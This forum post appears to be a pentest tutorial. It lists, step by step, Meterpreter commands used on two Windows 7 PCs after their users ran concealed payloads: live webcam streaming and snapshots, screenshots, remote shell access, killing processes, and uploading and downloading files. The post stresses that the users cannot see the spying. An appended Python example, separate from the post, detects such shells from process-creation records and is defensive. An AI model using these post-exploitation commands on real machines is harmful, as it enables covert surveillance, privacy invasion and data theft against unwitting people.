Learn About Computers

Teaching about Computers


    29. Wlan Pentest session on Two Windows 7 Pcs


    Post by Aof on Wed May 30, 2018 3:39 am


    The Users have already clicked the Payloads that were concealed earlier.
    The Payload has called the Linux Pc with a Meterpreter session.
    This video shows the Linux user entering the 2 Pcs through the Meterpreter Terminal.
    1. www.yougetsignal.com = do a quick check, make sure port 443 is open on the Public Ip address of the first Router.
    2. sessions -i = is entered in the listener to view all active connections that have been established.
    3. sessions -i 3 = connects to ID Number 3, the Windows 7 AUser user that has connected to the listener through the Payload.
    4. help = to view the help page for the meterpreter.
    5. webcam_list = views a list of webcams that are connected to AUser's Windows 7 Pc.
    6. webcam_stream 1 = streams from Webcam 1 attached to the AUser windows 7 Pc, which happens to be the only Webcam attached to the Pc.
    7. Ctrl + mouse wheel = It shows a small thumbnail through the Firefox browser; you can zoom in on the thumbnail by pressing Ctrl & rolling your mouse wheel. Rolling it one way makes it smaller, while the other makes it bigger.
    I told my friend over the Phone, then she gives me a thumbs up. She doesn't see anything on-screen to indicate that I am watching her, she tells me over the phone.
    8. Ctrl+C = I first exit the Streaming Firefox Tab, then go back to the Meterpreter Session and type Ctrl+C to cancel the Webcam Stream.
    9. webcam_snap 1 = takes a current snapshot of what webcam 1 is currently viewing.
    10. Opened the snapshot that had been taken with Linux default photo viewer, then use the mousewheel to zoom in on the Photo.
    11. help = typed help in the meterpreter session again, looked through the Meterpreter help page until I find Screenshot (I already knew this, but did this for demonstration purposes.)
    12. screenshot = takes a screenshot of AUser's screen, what they are viewing right now.
    It saved in the rc folder where the Listener was started.
    13. I navigate to the rc folder and preview the screenshot which was taken.
    14. shell = takes the meterpreter session right into AUser's Command Prompt as if we were standing right in front of it.
    15. tasklist = views the running processes on AUser's Windows 7 Pc.
    16. taskkill /im chrome.exe /f = kills the chrome internet browser.
    17. exit = exits the shell for AUser, and goes back to the Meterpreter session with AUser.
    18. screenshot = takes a new screenshot of AUser's screen.
    19. pwd = shows the Present Working Directory. If you get a warning that says "failed to open", don't worry about it, just type this command and it will bypass it.
    20. upload '//root//Desktop//sltb.PNG' "C:\\Users\\AUser\\Desktop\\sltb.PNG" = Uploads the file sltb.PNG from the Linux Pc to the AUser's Desktop.
    21. shell = returns to AUser's Shell. We were in the Desktop folder using the Meterpreter Session, so we are there using the Shell as well.
    22. dir = displays the files on AUser's Desktop.
    23. sltb.PNG = executes the image file from AUser's shell, displaying the picture on the Windows 7 Pc's Screen.
    24. exit = exits AUser's shell, Linux Pc returns back to the Meterpreter Session with AUser.
    25. screenshot = takes a Screenshot of AUser's screen.
    26. Navigate to the Rc folder, find the screenshot that was taken, and preview it with the default Linux Image Viewer.
    The Image that was uploaded using the Meterpreter session is being shown on their screen.
    27. pwd = We receive another annoying warning message, but just typed pwd to bypass it.
    28. shell = drops into AUser's shell again.
    29. taskkill /im dllhost.exe /f = I am familiar enough with windows 7 pcs, and have looked at the process of the default image viewer enough to remember the name was dllhost,
    so I task Killed the dllhost process, this process would have also shown up somewhere if we did the tasklist to view the running processes for AUser.
    30. exit = exits the shell, goes back to the Meterpreter session with AUser.
    31. screenshot = takes another screenshot of AUser's screen, the image should be closed now.
    32. Navigate to the Rc folder and view the screenshot, the image that was uploaded is now closed because the dllhost.exe process has been terminated.
    The Thumbnail of the image that was uploaded can be visibly seen on the Desktop, since we did not delete it, we just closed the image.
    We receive another annoying warning message, this time I close it by pressing Ctrl+c, I could've just typed "pwd" again.
    33. shell = Goes into the AUser's shell again.
    34. sltb.PNG = Starts the image file again.
    35. exit = exits AUser's Shell and goes back to the Meterpreter connection with AUser.
    36. dir = lists the files on the Desktop using the Meterpreter session. "ls" would have also listed the same files.
    Look for an image to download.
    37. download dspace.PNG = I gave the command to Download dspace.PNG file from AUser's Desktop. The dspace.PNG is opened from the usual rc folder, the same place where the screenshot and webcam snapshots were saved.
    38. screenshot = takes another screenshot of AUser's Desktop.
    39. Navigate to the rc folder, view the latest screenshot of AUser's Computer that the Meterpreter took.
    40. background = Backgrounding a Meterpreter session leaves it open for reconnecting as long as we have the Listener open.
    41. sessions -i 2 = opens the meterpreter session with the other pc that I had backgrounded in the Listener.
    42. pwd = finds where the meterpreter session was last backgrounded at, it was last backgrounded at GM Project's Desktop.
    43. screenshot = screenshot was taken, when it's viewed, it is revealed that GM Project's Computer Folder is currently open on their Pc.
    44. upload '//root//Desktop//sltb.PNG' "C:\\Users\\GM Project\\Desktop\\sltb.PNG" = uploads a file called sltb.PNG to the Target Pc from the Linux Pc using the Meterpreter Terminal.
    45. shell = Opens a shell between the Linux user and GM Project.
    46. dir = lists the files on Gm Project's Desktop.
    47. sltb.PNG = opens the image that was previously uploaded using GM Project's Shell.
    48. exit = exits the shell, goes back to the Meterpreter Session.
    49. screenshot = takes a screenshot of GM Project's Desktop.
    When the screenshot is viewed, it is discovered that the file is opened.
    50. dir = look for a photo to download from Gm Project's Desktop.
    51. download ozquote.PNG = downloads ozquote.PNG file from GM Project's Desktop since I am currently navigated there, there is no reason to type the full path with the Download Command.
    52. screenshot = takes another snapshot of GM Project's Desktop.
    If you were sitting in front of their computer, you couldn't see any of this going on except for commands executed by the shell that are visible on GM Project's screen, like when we opened the image that we uploaded to the pc.
    53. exit = completely closes the session with GM Project, will no longer be able to connect to it.
    54. sessions -i = views the remaining active connection with AUser.
    55. sessions -help = to view the switches associated with the Listener.
    It is discovered that the lowercase -k switch will terminate a session if the ID number is included.
    56. sessions -k 3 = Terminates the session with AUser's Pc.
    57. sessions -i = checks for active sessions, there are none.
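
On the Windows 7 side, the shell steps above (14 to 16 and 29) show up as process creations: a cmd.exe started by the payload process, followed by tasklist and taskkill as its children. The following is an added example, not part of the original post, that flags that pattern in process-creation records. The record fields, the allow-list of parents, the sample events and the payload file name are all constructed assumptions.

```python
# Added example: constructed process-creation records, not real telemetry.
# Field names are simplified assumptions, loosely modelled on process-creation logging.
from ntpath import basename

# Parents that normally start an interactive cmd.exe for a logged-on user (assumed allow-list).
EXPECTED_SHELL_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe"}
# Built-in tools the walkthrough runs from the remote shell.
WATCHED_TOOLS = {"tasklist.exe", "taskkill.exe"}

# Constructed sample, ordered by creation time; payload_placeholder.exe is a placeholder name.
SAMPLE_EVENTS = [
    {"pid": 1200, "ppid": 900, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 2040, "ppid": 1200, "image": r"C:\Users\AUser\Downloads\payload_placeholder.exe",
     "cmd": "payload_placeholder.exe"},
    {"pid": 2311, "ppid": 2040, "image": r"C:\Windows\System32\cmd.exe", "cmd": "cmd.exe"},
    {"pid": 2350, "ppid": 2311, "image": r"C:\Windows\System32\tasklist.exe", "cmd": "tasklist"},
    {"pid": 2362, "ppid": 2311, "image": r"C:\Windows\System32\taskkill.exe",
     "cmd": "taskkill /im chrome.exe /f"},
    # A user opening their own prompt from the desktop: must not be flagged.
    {"pid": 3000, "ppid": 1200, "image": r"C:\Windows\System32\cmd.exe", "cmd": "cmd.exe"},
    {"pid": 3010, "ppid": 3000, "image": r"C:\Windows\System32\tasklist.exe", "cmd": "tasklist"},
]

def find_suspicious_shells(events):
    """Return one finding per cmd.exe whose parent is not an expected shell parent,
    with the watched tools later started from that cmd.exe."""
    by_pid = {e["pid"]: e for e in events}
    findings = {}
    for e in events:  # events are assumed to be in creation order
        name = basename(e["image"]).lower()
        parent = by_pid.get(e["ppid"])
        if name == "cmd.exe" and parent is not None:
            if basename(parent["image"]).lower() not in EXPECTED_SHELL_PARENTS:
                findings[e["pid"]] = {"shell_pid": e["pid"],
                                      "parent": parent["image"],
                                      "commands": []}
        elif e["ppid"] in findings and name in WATCHED_TOOLS:
            findings[e["ppid"]]["commands"].append(e["cmd"])
    return list(findings.values())

if __name__ == "__main__":
    for f in find_suspicious_shells(SAMPLE_EVENTS):
        print(f["shell_pid"], f["parent"], f["commands"])
```
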

